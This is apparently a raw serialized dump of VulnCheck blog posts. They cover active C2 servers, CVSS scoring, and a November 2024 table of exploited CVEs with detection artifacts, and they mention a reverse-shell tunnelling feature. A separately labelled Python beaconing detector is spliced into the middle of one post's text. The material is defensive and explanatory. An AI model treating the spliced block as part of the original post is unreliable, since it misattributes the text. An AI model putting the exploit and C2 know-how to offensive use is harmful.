it.",[18,59004,59005,59008],{},[295,59006,59007],{},"Privilege Escalation","\nPrivilege escalation occurs when attackers gain higher levels of access within a system than initially compromised.",[18,59010,59011],{},"Active C2 servers can send instructions or additional tools to malware that allow it to exploit system vulnerabilities, elevating its permissions to an administrator or root level. 
This enables attackers to access restricted areas of the network.",[18,59013,59014],{},"With escalated privileges, attackers can move laterally across the network, compromise additional systems, and install persistent backdoors, making the breach significantly harder to contain.",[61,59016,59018],{"id":59017},"why-are-active-c2-servers-highly-exploitable","Why Are Active C2 Servers Highly Exploitable?",[18,59020,59021],{},"Active C2 servers are attractive targets for defenders because they are both a critical dependency for attackers and a potential weak point. Below are a few key examples of why active C2 servers are attractive targets for attackers.",[18,59023,59024,59027,59029],{},[295,59025,59026],{},"Centralized Operations",[1823,59028],{},"\nMany attackers centralize their campaigns through C2 servers. Disabling or taking over these servers disrupts the entire operation.",[18,59031,59032,59035,59037],{},[295,59033,59034],{},"Observable Patterns",[1823,59036],{},"\nMalware communicating with C2 servers often exhibits distinct behaviors, such as consistent beaconing intervals, making the infrastructure easier to detect.",[18,59039,59040,59043,59045],{},[295,59041,59042],{},"Publicly Available Frameworks",[1823,59044],{},"\nAttackers sometimes use off-the-shelf or open-source C2 frameworks, which may contain vulnerabilities that defenders can exploit to shut down operations.",[18,59047,59048,59051,59053],{},[295,59049,59050],{},"Redundant Infrastructure",[1823,59052],{},"\nWhile sophisticated attackers use redundant or multi-layered C2 networks, less advanced campaigns may rely on single points of failure, making them more vulnerable to takedowns.",[61,59055,59057],{"id":59056},"examples-of-active-c2-server-exploits","Examples of Active C2 Server Exploits",[18,59059,59060,59063,59065],{},[295,59061,59062],{},"Emotet Botnet",[1823,59064],{},"\nEmotet, a prolific malware campaign, used active C2 servers to distribute banking trojans, steal credentials, and spread 
laterally within networks. Its takedown in 2021 involved law enforcement seizing its active C2 infrastructure, effectively dismantling the botnet.",[18,59067,59068,59069,59071,59072,2230],{},"Here’s an all-you-can-eat paper on Emotet from HHS Department. ",[1823,59070],{},"Emotet Malware: The Enduring and Persistent Threat to the Health Sector(",[47,59073,59074],{"href":59074,"rel":59075},"https:\u002F\u002Fwww.hhs.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Femotet-the-enduring-and-persistent-threat-to-the-hph-tlpclear.pdf",[51],[18,59077,59078,59079,59084],{},"Here is ",[47,59080,59083],{"href":59081,"rel":59082},"https:\u002F\u002Fwww.sentinelone.com\u002Fblog\u002Femotet-story-of-disposable-c2-servers\u002F",[51],"a better explanation from SentinelOne"," more to the point on how Emotet malware specifically targets active and ‘disposable’ C2 servers.",[18,59086,59087,59090,59092],{},[295,59088,59089],{},"Conti Ransomware Group",[1823,59091],{},"\nActive C2 servers were integral to the Conti ransomware operation, enabling the group to exfiltrate sensitive data and deploy ransomware to targeted organizations. Defenders neutralized its threat by tracking its C2 communication patterns and blocking them.",[18,59094,59095,59096,59101],{},"Here’s a ",[47,59097,59100],{"href":59098,"rel":59099},"https:\u002F\u002Fheimdalsecurity.com\u002Fblog\u002Fwhat-is-conti-ransomware\u002F",[51],"blog from Heimdal Security"," that provides the full history of the Conti ransomware group with an insightful section on how Tor proxies helped hide exposure to the C2 server so the malware payload was delivered across many attacks over time.",[18,59103,59104,59107,59109],{},[295,59105,59106],{},"APT41's Espionage Campaigns",[1823,59108],{},"\nAdvanced Persistent Threat (APT) groups like APT41 rely on active C2 servers to manage long-term espionage activities. 
These servers control the exfiltration of sensitive data from targeted organizations and issue commands to maintain persistence.",[61,59111,59113],{"id":59112},"how-defenders-can-respond-to-active-c2-threats","How Defenders Can Respond to Active C2 Threats",[18,59115,59116],{},"To protect against active C2 servers, defenders can take these actions:",[18,59118,59119,59122,59124],{},[295,59120,59121],{},"Threat Intelligence Integration",[1823,59123],{},"\nSubscribe to feeds that provide updated lists of known active C2 IPs, domains, and behavioral patterns. Integrate these feeds with other relevant intelligence based on your organization’s attack profile across vulnerabilities, software and products owned to correlate your exposure status to take action.",[18,59126,59127,59130,59132],{},[295,59128,59129],{},"Traffic Analysis",[1823,59131],{},"\nMonitor for anomalous network traffic, such as unexpected outbound connections to unknown IP addresses or domains.",[18,59134,59135,59138,59140],{},[295,59136,59137],{},"Sinkholing and Takedowns",[1823,59139],{},"\nRedirect traffic away from active C2 servers or collaborate with law enforcement to dismantle them.",[18,59142,59143,59146,59148],{},[295,59144,59145],{},"Proactive Security Measures",[1823,59147],{},"\nRegularly patch systems to prevent privilege escalation and enforce least-privilege policies to limit attackers’ access.",[61,59150,59152],{"id":59151},"summary-and-resources","Summary and Resources",[18,59154,59155],{},"Active C2 servers represent a dynamic and ongoing threat in the cybersecurity landscape. 
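The "observable patterns" and "traffic analysis" points above come down to one measurable property: an implant checking in on a timer produces inter-connection gaps with far less spread than a person browsing. The following added example, which is not VulnCheck's tooling, groups an outbound connection log by (source, destination, port), measures the coefficient of variation of the gaps, and reports pairs whose timing is too regular to be human. The log lines are constructed for the demo.

```python
"""Added example, not VulnCheck's tooling: flag likely C2 beaconing in an
outbound connection log by measuring how regular the gaps between one host's
connections to one destination are. The log records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def build_log(start, src, dst, dport, gaps_seconds):
    """Constructed flow records 'timestamp src dst dport', one per connection."""
    t = datetime.fromisoformat(start)
    lines = [f"{t.isoformat()} {src} {dst} {dport}"]
    for gap in gaps_seconds:
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} {src} {dst} {dport}")
    return lines


# Constructed sample: one implant beaconing about every 60 s with small jitter,
# one user browsing the same port with bursty, irregular gaps.
SAMPLE_LOG = "\n".join(
    build_log("2024-12-12T10:00:00", "10.0.0.5", "203.0.113.7", 443,
              [60, 61, 59, 60, 62, 58, 60, 61, 59])
    + build_log("2024-12-12T10:00:00", "10.0.0.9", "198.51.100.20", 443,
                [3, 45, 2, 600, 7, 1, 120, 30, 5])
)


def parse_flows(text):
    """Group connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows


def beacon_score(times):
    """Return (mean_gap_seconds, coefficient_of_variation) for a series of
    connection times, or None when there are too few to judge."""
    if len(times) < 2:
        return None
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    avg = mean(gaps)
    if avg <= 0:
        return None
    return avg, pstdev(gaps) / avg


def find_beacons(flows, min_connections=8, max_cv=0.2):
    """Pairs whose gap jitter is below max_cv: a low CV means a timer, not a person.
    min_connections keeps a handful of coincidentally spaced hits from alerting."""
    hits = {}
    for key, times in flows.items():
        if len(times) < min_connections:
            continue
        score = beacon_score(times)
        if score and score[1] <= max_cv:
            hits[key] = {"interval": score[0], "cv": score[1], "count": len(times)}
    return hits


if __name__ == "__main__":
    for key, info in find_beacons(parse_flows(SAMPLE_LOG)).items():
        print(key, info)
```

The thresholds are the tuning knobs: a beacon with 10 percent jitter still has a CV around 0.06, well under 0.2, while even modest human activity lands above 1.0. Slow beacons (hours apart) need a longer observation window before `min_connections` is reached, and a destination fronted by a CDN will mix many users' traffic into one pair, so scope the key to the source host as shown rather than to the destination alone.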
By understanding how they operate, the risks they pose, and the steps defenders can take to mitigate their impact, organizations can strengthen their posture against advanced attacks.",[18,59157,59158,59159,59],{},"For more in-depth cybersecurity insights, ",[47,59160,59163],{"href":59161,"rel":59162},"https:\u002F\u002Fdocs.vulncheck.com\u002Fkb\u002Fexploit-intelligence-101",[51],"visit VulnCheck’s Exploit Intelligence 101 Knowledge Base",[44317,59165],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":59167},[59168,59169,59170,59171,59172,59173],{"id":58934,"depth":220,"text":58935},{"id":58971,"depth":220,"text":58972},{"id":59017,"depth":220,"text":59018},{"id":59056,"depth":220,"text":59057},{"id":59112,"depth":220,"text":59113},{"id":59151,"depth":220,"text":59152},"2024-12-12","Exploit Intel 101 - Active C2 Servers",{"slug":59177},"active-c2-servers","\u002Fblog\u002Factive-c2-servers",{"title":58911,"description":59175},{"title":41489,"color":41490,"icon":41491},"blog\u002Factive-c2-servers",[41494],"IopKKSRGylnvBsCtgxFTBvKP8I1HIBPv5Chrn8beY_E",{"id":59185,"title":59186,"articles":7,"authors":59187,"body":59189,"date":59174,"description":59388,"extension":234,"image":7,"link":7,"meta":59389,"navigation":237,"path":59391,"seo":59392,"series":59393,"stem":59394,"subtype":7,"tags":59395,"__hash__":59396},"blog\u002Fblog\u002Fcommon-vulnerability-scoring-system.md","Common Vulnerability Scoring System (CVSS)",[59188],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":59190,"toc":59376},[59191,59193,59204,59208,59211,59214,59218,59221,59224,59244,59248,59251,59254,59257,59263,59266,59272,59276,59279,59282,59293,59297,59300,59306,59309,59313,59316,59319,59322,59326,59329,59335,59339,59342,59345,59348,59351,59355,59358,59361,59364,59366,59369,59374],[18,59192,44358],{},[22,59194,59195,59198,59201],{},[25,59196,59197],{},"The Common Vulnerability Scoring System (CVSS) is a widely used framework for assessing the severity of 
software vulnerabilities.",[25,59199,59200],{},"Why assigning a numerical score to vulnerabilities provides a standardized way for organizations to assess risk, prioritize remediation efforts, and communicate the severity of vulnerabilities effectively.",[25,59202,59203],{},"The essential components of CVSS, focusing on the most widely implemented version, CVSS 3.1, while exploring its benefits, limitations, and evolution.",[61,59205,59207],{"id":59206},"what-is-cvss","What Is CVSS?",[18,59209,59210],{},"With thousands of vulnerabilities disclosed annually, determining which to address first can be overwhelming. CVSS is one tool that organizations can use to help solve this problem by offering a consistent, objective framework to score vulnerabilities based on their potential impact and ease of exploitation, and other important factors.",[18,59212,59213],{},"Before CVSS, the lack of a standardized system often led to inconsistent assessments across vendors, security teams, and industries. CVSS ensures that vulnerabilities are evaluated using a common framework, making it easier to compare risks across systems.",[61,59215,59217],{"id":59216},"the-core-of-cvss-base-scores","The Core of CVSS: Base Scores",[18,59219,59220],{},"The Base Score is the cornerstone of the CVSS framework. It measures the intrinsic severity of a vulnerability, independent of temporal or environmental factors. The CVSS Base Score is calculated using a set of metrics that describe how the vulnerability can be exploited and its potential impact.",[18,59222,59223],{},"Key metrics of the CVSS Base Score include:",[22,59225,59226,59229,59232,59235,59238,59241],{},[25,59227,59228],{},"Attack Vector (AV): This metric describes how an attacker can exploit the vulnerability. 
A vulnerability exploitable remotely over a network scores higher than one requiring local access because the attack surface is broader, and offers greater exposure to threat actors.",[25,59230,59231],{},"Attack Complexity (AC): This captures the difficulty of successfully exploiting the vulnerability. If an exploit requires specific conditions or dependencies to be met, the complexity is high, resulting in a lower score.",[25,59233,59234],{},"Privileges Required (PR): This metric assesses whether an attacker needs elevated privileges to exploit the vulnerability. Vulnerabilities that can be exploited without any special permissions are scored higher.",[25,59236,59237],{},"User Interaction (UI): Exploits that require a user to take an action, such as clicking a link or opening a file, score lower than those that require no user interaction.",[25,59239,59240],{},"Scope (S): Scope measures whether the impact of exploitation is confined to the vulnerable component or extends beyond its security boundary. Vulnerabilities that can affect other systems or applications are scored higher.",[25,59242,59243],{},"Confidentiality (C), Integrity (I), and Availability (A): These metrics evaluate the impact of exploitation on data confidentiality, data integrity, and system availability, respectively. A vulnerability compromising all three dimensions scores higher.",[61,59245,59247],{"id":59246},"example-cvss-base-scores-and-vectors","Example CVSS Base Scores and Vectors",[18,59249,59250],{},"To generate a CVSS Base Score, these metrics are interpreted using a standardized algorithm in order to generate a score between 0.0 and 10.0, representing the inherent risk. This simple score can be used as a component in vulnerability prioritization.",[18,59252,59253],{},"That said, the individual metrics provide a good degree of context about a vulnerability, which is lost when the metrics are condensed to a simple score. 
In order to capture the deeper context behind the score, CVSS also defines a Vector String which incorporates all the metrics in a format that’s simple for humans and machines to interpret. Let’s look at a couple of examples.",[18,59255,59256],{},"For example, CVE-2024-9989 is an authentication bypass vulnerability in WordPress that makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, so long as they have access to the username. It can be exploited easily over the network without any special privileges or user interaction. This vulnerability has been assigned the following CVSS vector, which computes to a CVSS Base Score of 9.8:",[1354,59258,59261],{"className":59259,"code":59260,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\n",[886,59262,59260],{"__ignoreMap":219},[18,59264,59265],{},"Imagine that this vulnerability presented slightly differently, requiring the attacker to have access to an existing low-privilege user account, and requiring the attacker to perform a complicated cryptographic analysis in order to perform a successful exploit. These changes in Attack Complexity and Privileges Required result in a lower CVSS Base Score of 7.5, and modifications to the CVSS Vector:",[1354,59267,59270],{"className":59268,"code":59269,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002F**AC:H**\u002F**PR:L**\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\n",[886,59271,59269],{"__ignoreMap":219},[61,59273,59275],{"id":59274},"temporal-scores-adding-context-over-time","Temporal Scores: Adding Context Over Time",[18,59277,59278],{},"While Base Scores represent the intrinsic characteristics of a vulnerability, they don’t account for changing factors such as exploit availability or remediation efforts. This is where the CVSS Temporal Score comes in. 
Temporal Scores adjust the CVSS Base Score to reflect the current state of a vulnerability.",[18,59280,59281],{},"Key metrics of the Temporal Score include:",[22,59283,59284,59287,59290],{},[25,59285,59286],{},"Exploit Code Maturity (E): This metric evaluates whether exploit code is available and how reliable it is. Vulnerabilities with publicly available, functional exploit code score higher, as it makes it simpler for lower-skilled attackers to leverage the vulnerability.",[25,59288,59289],{},"Remediation Level (RL): Remediation Level highlights the status of a fix, if any, for the vulnerability. When a vulnerability is first discovered, there will be no solution available. Over time, vendors may release temporary workarounds, and eventually a patch or other permanent fix. Vulnerabilities with official, permanent fixes are scored lower than vulnerabilities with less reliable fixes.",[25,59291,59292],{},"Report Confidence (RC): The reliability of the vulnerability report is also considered. 
Verified vulnerabilities score higher than those based on unconfirmed or speculative reports.",[61,59294,59296],{"id":59295},"example-temporal-scoring","Example Temporal Scoring",[18,59298,59299],{},"Returning to our CVE-2024-9989 example, once the vendor releases an official patch for the vulnerability, the Remediation Level is updated to reflect it, and the overall CVSS score (Base + Temporal) goes down from 9.8 to 9.4.",[1354,59301,59304],{"className":59302,"code":59303,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\u002F**RL:O**\n",[886,59305,59303],{"__ignoreMap":219},[18,59307,59308],{},"This dynamic adjustment helps organizations focus on the most pressing vulnerabilities as the situation evolves.",[61,59310,59312],{"id":59311},"environmental-metrics-customizing-for-your-environment","Environmental Metrics: Customizing for Your Environment",[18,59314,59315],{},"Every organization has unique systems, configurations, and priorities. The CVSS Environmental Score allows security teams to tailor the Base and Temporal Scores to their specific context. This customization ensures that vulnerabilities are assessed based on their actual impact on the organization’s environment.",[18,59317,59318],{},"Environmental metrics modify the Base Score by accounting for factors such as the criticality of the affected system or the sensitivity of the data it processes. For example, a vulnerability in a system storing sensitive customer information might receive a higher score in an organization with strict regulatory requirements.",[18,59320,59321],{},"Organizations may also modify the base metrics to reflect their own situation. 
This allows security teams to take into account their own local defensive countermeasures and other factors that might not be fully reflected in the Base Score metrics.",[61,59323,59325],{"id":59324},"example-environmental-scoring","Example Environmental Scoring",[18,59327,59328],{},"Returning to our CVE-2024-9989 once more, let’s consider a specific organization. Our example organization uses WordPress only internally for publishing the results from the weekly departmental bowling tournament. This data has low importance from the perspective of confidentiality, integrity, and availability. It’s also not accessible from the outside, but instead requires a user to have access to the local network. These circumstances significantly reduce the risk of damage from an exploit of CVE-2024-9989, and the CVSS score (Base + Environmental) is reduced from 9.8 down to 6.6, with the following CVSS vector:",[1354,59330,59333],{"className":59331,"code":59332,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\u002F**CR:L\u002FIR:L\u002FAR:L\u002FMAV:L**\n",[886,59334,59332],{"__ignoreMap":219},[61,59336,59338],{"id":59337},"limitations-of-cvss","Limitations of CVSS",[18,59340,59341],{},"While CVSS is a powerful tool to assist in vulnerability prioritization and risk management, it is not without its limitations. As seen above, there is a great deal of complexity hidden behind what many think of as a simple numerical score.",[18,59343,59344],{},"A CVSS Base Score is derived from 8 different metrics, each requiring accurate data and judgment. Incorporating temporal and environmental factors adds 14 additional metrics, which can change over time. Misinterpretations or inconsistent application of these metrics can lead to misleading scores. 
Few vulnerability management solutions provide the flexibility to routinely manage all this data across a large enterprise environment.",[18,59346,59347],{},"In addition, keeping abreast of temporal and environmental developments that affect CVSS scoring is a daunting challenge. New exploits are released every day, sometimes for vulnerabilities that were originally disclosed months or years in the past. Vendor disclosures and public vulnerability databases fall out-of-date rapidly. Effective prioritization requires a good stream of exploit intelligence and effective tools for ingesting and operationalizing it.",[18,59349,59350],{},"Finally, the existence of multiple versions of CVSS, with varying levels of adoption, further complicates matters. CVSS 3.1 is widely supported in most environments today, but some tools and vendors still use earlier versions, leading to inconsistencies in scoring and prioritization.",[61,59352,59354],{"id":59353},"the-evolution-of-cvss-a-look-at-40","The Evolution of CVSS: A Look at 4.0",[18,59356,59357],{},"CVSS 4.0 has also been released, and while it adds more nuance and context than previous versions, it also promises to introduce confusion as it is slowly adopted.",[18,59359,59360],{},"One of the most notable changes is support for vulnerability chaining, allowing for better representation of complex attack scenarios. Additionally, CVSS 4.0 refines metrics like Exploitability and introduces qualitative scoring (High, Medium, Low) as an alternative to numeric scores.",[18,59362,59363],{},"These updates aim to make CVSS more comprehensive while remaining practical for security teams. Although adoption of CVSS 4.0 will take time, it represents a step forward in addressing the evolving challenges of vulnerability management.",[61,59365,1903],{"id":1902},[18,59367,59368],{},"CVSS provides a standardized and consistent approach to assessing the severity of software vulnerabilities. 
The framework equips organizations with much of the context needed to prioritize their remediation efforts effectively. However, understanding its limitations is crucial to using it wisely. By supplementing CVSS scores with rich exploit intelligence and keeping abreast of its evolution, security professionals can better manage the complex landscape of vulnerabilities.",[18,59370,59158,59371,59],{},[47,59372,59163],{"href":59161,"rel":59373},[51],[44317,59375],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":59377},[59378,59379,59380,59381,59382,59383,59384,59385,59386,59387],{"id":59206,"depth":220,"text":59207},{"id":59216,"depth":220,"text":59217},{"id":59246,"depth":220,"text":59247},{"id":59274,"depth":220,"text":59275},{"id":59295,"depth":220,"text":59296},{"id":59311,"depth":220,"text":59312},{"id":59324,"depth":220,"text":59325},{"id":59337,"depth":220,"text":59338},{"id":59353,"depth":220,"text":59354},{"id":1902,"depth":220,"text":1903},"Exploit Intel 101 - Common Vulnerability Scoring System (CVSS)",{"slug":59390},"common-vulnerability-scoring-system","\u002Fblog\u002Fcommon-vulnerability-scoring-system",{"title":59186,"description":59388},{"title":41489,"color":41490,"icon":41491},"blog\u002Fcommon-vulnerability-scoring-system",[41494],"F5pAOBD1l-YuWpziYnLYW8Tk-a3BOj-1vTuYgZ3y3Yc",{"id":59398,"title":59399,"articles":7,"authors":59400,"body":59402,"date":59866,"description":59867,"extension":234,"image":7,"link":7,"meta":59868,"navigation":237,"path":59870,"seo":59871,"series":7,"stem":59872,"subtype":7,"tags":59873,"__hash__":59874},"blog\u002Fblog\u002Finitial-access-intelligence-november-2024.md","Detecting Exploitation w\u002F VulnCheck Initial Access Intelligence - November 
2024",[59401],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":59403,"toc":59859},[59404,59410,59413,59416,59420,59427,59431,59434,59459,59463,59827,59831,59842,59848,59852],[18,59405,59406],{},[68,59407],{":width":10862,"alt":59408,"src":59409},"Initial Access Intelligence - November 2024","\u002Fblog\u002Finitial-access-intelligence-november-2024\u002Finitial-access-november-2024.png",[18,59411,59412],{},"VulnCheck Initial Access Intelligence equips organizations and security teams with detection artifacts including Suricata signatures, YARA rules, PCAPs, and private exploit PoCs to defend against initial access vulnerabilities that are either already being exploited or likely to be exploited soon.",[18,59414,59415],{},"In November 2024, VulnCheck released Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 14 different vendors and products. 11 of the 14 have confirmed exploitation activity as of December 11th, 2024. The release of these detection artifacts covers widely used edge devices from vendors including Palo Alto, Citrix, D-Link, Fortinet and Netgear.",[61,59417,59419],{"id":59418},"projectsend-exploitation-discovery","ProjectSend Exploitation Discovery",[18,59421,59422,59423],{},"In November we discovered public-facing ProjectSend instances that appeared to have been exploited by attackers. As of November 25th, 99% of ProjectSend instances remained vulnerable and have not upgraded to the patched version released in August. Public exploits have pre-dated CVE assignment by months, including Nuclei templates and a weaponized Metasploit module. So we issued a CVE and released our research and initial artifacts for the vulnerability. 
Learn more about the research in our ",[47,59424,59426],{"href":53833,"rel":59425},[51],"Project Send Blog Post",[61,59428,59430],{"id":59429},"initial-access-intelligence-november-breakdown","Initial Access Intelligence - November Breakdown",[18,59432,59433],{},"To provide better visibility into these updates, we’ve broken down November’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,59435,59436,59438,59441,59444,59447,59450,59453,59456],{},[25,59437,325],{},[25,59439,59440],{},"Version scanners",[25,59442,59443],{},"PCAPs",[25,59445,59446],{},"Suricata rules",[25,59448,59449],{},"Snort rules",[25,59451,59452],{},"YARA rules",[25,59454,59455],{},"Greynoise\u002FCensys\u002FShodan\u002FFOFA\u002FZoomEye Queries",[25,59457,59458],{},"Target Docker Containers",[61,59460,59462],{"id":59461},"november-2024-initial-access-artifacts","November 2024 Initial Access Artifacts",[307,59464,59465,59495],{},[310,59466,59467],{},[313,59468,59469,59472,59475,59477,59480,59483,59486,59489,59492],{},[316,59470,59471],{},"Artifact Name",[316,59473,59474],{},"Date Added",[316,59476,242],{},[316,59478,59479],{},"Exploit",[316,59481,59482],{},"Version Scanner",[316,59484,59485],{},"pcap",[316,59487,59488],{},"Suricata Rule",[316,59490,59491],{},"Snort Rule",[316,59493,59494],{},"Yara",[336,59496,59497,59521,59543,59564,59585,59607,59629,59651,59673,59695,59717,59739,59761,59783,59805],{},[313,59498,59499,59502,59505,59508,59511,59513,59515,59517,59519],{},[341,59500,59501],{},"Derby SQL based RCE",[341,59503,59504],{},"2024-11",[341,59506,59507],{},"CVE-2021-29442",[341,59509,59510],{},"✅",[341,59512,59510],{},[341,59514,59510],{},[341,59516,59510],{},[341,59518,59510],{},[341,59520,59510],{},[313,59522,59523,59526,59528,59531,59533,59535,59537,59539,59541],{},[341,59524,59525],{},"ProjectSend Incorrect Authorization Webshell 
Upload",[341,59527,59504],{},[341,59529,59530],{},"CVE-2024-11680",[341,59532,59510],{},[341,59534,59510],{},[341,59536,59510],{},[341,59538,59510],{},[341,59540,59510],{},[341,59542,59510],{},[313,59544,59545,59548,59550,59552,59554,59556,59558,59560,59562],{},[341,59546,59547],{},"Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability",[341,59549,59504],{},[341,59551,40163],{},[341,59553,59510],{},[341,59555,59510],{},[341,59557,59510],{},[341,59559,59510],{},[341,59561,59510],{},[341,59563],{},[313,59565,59566,59569,59571,59573,59575,59577,59579,59581,59583],{},[341,59567,59568],{},"Palo Alto Networks PAN-OS Management Interface Command Injection Vulnerability",[341,59570,59504],{},[341,59572,40168],{},[341,59574,59510],{},[341,59576,59510],{},[341,59578,59510],{},[341,59580,59510],{},[341,59582,59510],{},[341,59584],{},[313,59586,59587,59590,59592,59595,59597,59599,59601,59603,59605],{},[341,59588,59589],{},"Citrix Session Recording (Virtual Apps and Desktops) .NET Deserialization",[341,59591,59504],{},[341,59593,59594],{},"CVE-2024-8069",[341,59596,59510],{},[341,59598],{},[341,59600,59510],{},[341,59602,59510],{},[341,59604,59510],{},[341,59606],{},[313,59608,59609,59612,59614,59617,59619,59621,59623,59625,59627],{},[341,59610,59611],{},"D-Link ShareCenter Command Injection",[341,59613,59504],{},[341,59615,59616],{},"CVE-2024-10914",[341,59618,59510],{},[341,59620,59510],{},[341,59622,59510],{},[341,59624,59510],{},[341,59626,59510],{},[341,59628],{},[313,59630,59631,59634,59636,59639,59641,59643,59645,59647,59649],{},[341,59632,59633],{},"Netgear WAX206",[341,59635,59504],{},[341,59637,59638],{},"CVE-2024-20017",[341,59640],{},[341,59642,59510],{},[341,59644],{},[341,59646],{},[341,59648],{},[341,59650],{},[313,59652,59653,59656,59658,59661,59663,59665,59667,59669,59671],{},[341,59654,59655],{},"pgAdmin OAuth2 Information 
Disclosure",[341,59657,59504],{},[341,59659,59660],{},"CVE-2024-9014",[341,59662,59510],{},[341,59664,59510],{},[341,59666,59510],{},[341,59668,59510],{},[341,59670,59510],{},[341,59672],{},[313,59674,59675,59678,59680,59683,59685,59687,59689,59691,59693],{},[341,59676,59677],{},"Fortinet FortiOS Out-of-Bound Write",[341,59679,59504],{},[341,59681,59682],{},"CVE-2024-21762",[341,59684],{},[341,59686],{},[341,59688,59510],{},[341,59690,59510],{},[341,59692,59510],{},[341,59694],{},[313,59696,59697,59700,59702,59705,59707,59709,59711,59713,59715],{},[341,59698,59699],{},"Versa Director Favicon Upload (authenticated)",[341,59701,59504],{},[341,59703,59704],{},"CVE-2024-39717",[341,59706],{},[341,59708],{},[341,59710],{},[341,59712],{},[341,59714],{},[341,59716],{},[313,59718,59719,59722,59724,59727,59729,59731,59733,59735,59737],{},[341,59720,59721],{},"Apache Solr Authentication Bypass",[341,59723,59504],{},[341,59725,59726],{},"CVE-2024-45216",[341,59728,59510],{},[341,59730,59510],{},[341,59732,59510],{},[341,59734,59510],{},[341,59736,59510],{},[341,59738],{},[313,59740,59741,59744,59746,59749,59751,59753,59755,59757,59759],{},[341,59742,59743],{},"Acronis Cyber Protect Unauthenticated RCE",[341,59745,59504],{},[341,59747,59748],{},"CVE-2022-3405",[341,59750,59510],{},[341,59752],{},[341,59754,59510],{},[341,59756,59510],{},[341,59758,59510],{},[341,59760],{},[313,59762,59763,59766,59768,59771,59773,59775,59777,59779,59781],{},[341,59764,59765],{},"CyberPanel OPTIONS Command Injection",[341,59767,59504],{},[341,59769,59770],{},"CVE-2024-51378",[341,59772,59510],{},[341,59774],{},[341,59776,59510],{},[341,59778,59510],{},[341,59780,59510],{},[341,59782],{},[313,59784,59785,59788,59790,59793,59795,59797,59799,59801,59803],{},[341,59786,59787],{},"Smart HMI WebIQ File 
Leak",[341,59789,59504],{},[341,59791,59792],{},"CVE-2024-8752",[341,59794,59510],{},[341,59796,59510],{},[341,59798,59510],{},[341,59800,59510],{},[341,59802,59510],{},[341,59804],{},[313,59806,59807,59810,59812,59815,59817,59819,59821,59823,59825],{},[341,59808,59809],{},"Delta Electronics InfraSuite Device Master Deserialization",[341,59811,59504],{},[341,59813,59814],{},"CVE-2023-47207",[341,59816,59510],{},[341,59818],{},[341,59820,59510],{},[341,59822,59510],{},[341,59824,59510],{},[341,59826],{},[61,59828,59830],{"id":59829},"go-exploit-framework","Go Exploit Framework",[18,59832,59833,59834,59838,59839],{},"In October, we expanded the capabilities of go-exploit to include a ",[47,59835,59837],{"href":58240,"rel":59836},[51],"new command and control feature called ShellTunnel"," which captures reverse shell traffic and routes it through an intermediary attacker-controlled server before reaching the main C2 server. ",[47,59840,58240],{"href":58240,"rel":59841},[51],[18,59843,59844,59845,59],{},"For those new to go-exploit, VulnCheck's exploit proof of concept (PoC) and version scanner code is written in the Go programming language. They are provided with a Dockerfile for ease of use. 
The exploits leverage an Open Source Software (OSS) shared library, which VulnCheck has authored and maintains, called ",[47,59846,20558],{"href":14297,"rel":59847},[51],[61,59849,59851],{"id":59850},"learn-more-about-vulncheck-initial-access-intelligence","Learn More About VulnCheck Initial Access Intelligence",[18,59853,59854,59855],{},"Learn more about how you can leverage Initial Access Intelligence detection artifacts to detect & respond to remote code execution (RCE) vulnerabilities here: ",[47,59856,59857],{"href":59857,"rel":59858},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Finitial-access-intelligence\u002Fintroduction",[51],{"title":219,"searchDepth":220,"depth":220,"links":59860},[59861,59862,59863,59864,59865],{"id":59418,"depth":220,"text":59419},{"id":59429,"depth":220,"text":59430},{"id":59461,"depth":220,"text":59462},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"2024-12-11","In November 2024, VulnCheck developed new Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 14 different vendors and products.",{"slug":59869},"initial-access-intelligence-november-2024","\u002Fblog\u002Finitial-access-intelligence-november-2024",{"title":59399,"description":59867},"blog\u002Finitial-access-intelligence-november-2024",[1281],"TL0WDB5blMMrbUAo7MmyI5pmQ4SOWX-P4u0SZ-WuatA",{"id":59876,"title":59877,"articles":7,"authors":59878,"body":59880,"date":60086,"description":59888,"extension":234,"image":7,"link":7,"meta":60087,"navigation":237,"path":60089,"seo":60090,"series":7,"stem":60091,"subtype":7,"tags":60092,"__hash__":60093},"blog\u002Fblog\u002Fcomparing-kevs-jupyter.md","A Peek Into the Known Exploited Vulnerabilities of 
